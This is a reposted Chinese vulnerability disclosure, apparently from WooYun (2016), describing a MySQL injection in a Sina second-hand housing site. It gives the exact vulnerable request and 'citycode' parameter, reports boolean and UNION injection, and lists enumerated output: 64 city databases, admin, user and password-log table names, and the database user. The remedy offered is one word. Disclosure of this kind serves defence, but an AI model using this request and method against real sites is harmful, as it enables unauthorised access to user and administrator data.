记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

新浪某站MySQL注射(支持三种查询/全城市站点数据/管理员数据)

2016-06-12 05:15

code 区域
GET /di/positioncommunity/?citycode=cd&x=104.03249595349092&y=30.607376004698764&callback=jsonp4&_=1461490791828 HTTP/1.1

Host: cd.esf.sina.com.cn

Connection: close

Accept: */*

User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13E238 KoudailejuApp

Accept-Language: zh-cn

Referer: http://m.leju.com/touch/esf/cd?ln=ljmf_h5&source=ios&s=yd_kdlj

Accept-Encoding: gzip, deflate





新浪二手房站点



code 区域
注入参数#citycode





漏洞证明:

1.png





布尔注入

1.png





UNION联合查询

1.png





全国64个库



code 区域
[*] information_sch

[*] mysql

[*] performance_sch

[*] shop_admin

[*] shop_anshan

[*] shop_bt

[*] shop_cc

[*] shop_cd

[*] shop_cq

[*] shop_cs

[*] shop_cz

[*] shop_dg

[*] shop_dl

[*] shop_fs

[*] shop_fushun

[*] shop_fz

[*] shop_gg

[*] shop_gl

[*] shop_gy

[*] shop_gz

[*] shop_haikou

[*] shop_heb

[*] shop_hf

[*] shop_hhht

[*] shop_huizhou

[*] shop_hz

[*] shop_jn

[*] shop_km

[*] shop_ks

[*] shop_lanzhou

[*] shop_lw

[*] shop_nb

[*] shop_nc

[*] shop_nj

[*] shop_nn

[*] shop_nt

[*] shop_qd

[*] shop_qhd

[*] shop_sanya

[*] shop_sh

[*] shop_sjz

[*] shop_suzhou

[*] shop_sy

[*] shop_sz

[*] shop_tangshan

[*] shop_ty

[*] shop_weifang

[*] shop_weihai

[*] shop_wh

[*] shop_wlmq

[*] shop_wuhu

[*] shop_wx

[*] shop_xian

[*] shop_xm

[*] shop_xz

[*] shop_yangzhou

[*] shop_yinchuan

[*] shop_yt

[*] shop_zb

[*] shop_zhengzhou

[*] shop_zhongshan

[*] shop_zhuhai

[*] shop_zz

[*] test





code 区域
ad_list

ad_name

ad_time

community_distanceset

community_distanceset

community_stype

community_stype_set

community_stype_set_l

count_house_avgprice

dict_districtblock

dict_districtblock_me

es_home_compare

es_home_spider

es_pinzhuan_keyword

es_pinzhuan_keyword_w

es_pinzhuan_status

esf_acl_access

esf_acl_role

esf_acl_role_access

esf_acl_user

esf_acl_user_role

esf_city_price

esf_delegate_agent

esf_delegate_house

esf_delegate_pic

esf_home_apply

esf_home_fangjia

esf_home_info

esf_home_info_ext

esf_home_info_tmp_jia

esf_home_jiaju

esf_home_othername

esf_home_pic_fx

esf_home_pic_xq

esf_home_pinzhuan

esf_home_price

esf_home_relation

esf_home_score

esf_home_setting

esf_home_subway

esf_home_transfer

esf_home_user

esf_home_usertop

esf_home_weixin

esf_home_zhida

esf_house_chuchuang

esf_house_rzassign

esf_house_rzassign_lo

esf_house_rzassign_us

esf_house_tag

esf_house_urlwhite

esf_shop_house

esf_shop_house_assign

esf_shop_house_pic

esf_sitemap

esf_smsout

esf_user_helperpic

esf_user_mainhome

esf_user_shop

esf_weixin_log

esf_weixin_menu

esf_weixin_passport

esf_weixin_passport2

esf_weixin_subscribe

esf_weixin_subscribe_

esf_weixin_ticket

esf_weixin_ticket_use

esf_weixin_user

fnj_agent

job_distribute

job_log

mobile_pocketagent_bo

mobile_sendmessage_lo

push_data_log

sp_agentphone

sp_lime

sp_log

sp_member

sp_notice

sp_pay_log

sp_permission

sp_pwd_log

sp_role

sp_role_permission

sp_sys_user

sp_sys_userpermission

sp_user

sp_user_bj

sp_user_del_log

sp_user_ext

sp_user_ext_sh

sp_user_loginlog

sp_user_pic

sp_user_sh

sp_weixin_log

sp_weixin_user

test





code 区域
当前数据库:'shop_admin'



当前数据库用户:'[email protected] %'

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2016-0200165

阅读:135864 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“新浪某站MySQL注射(支持三种查询/全城市站点数据/管理员数据)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词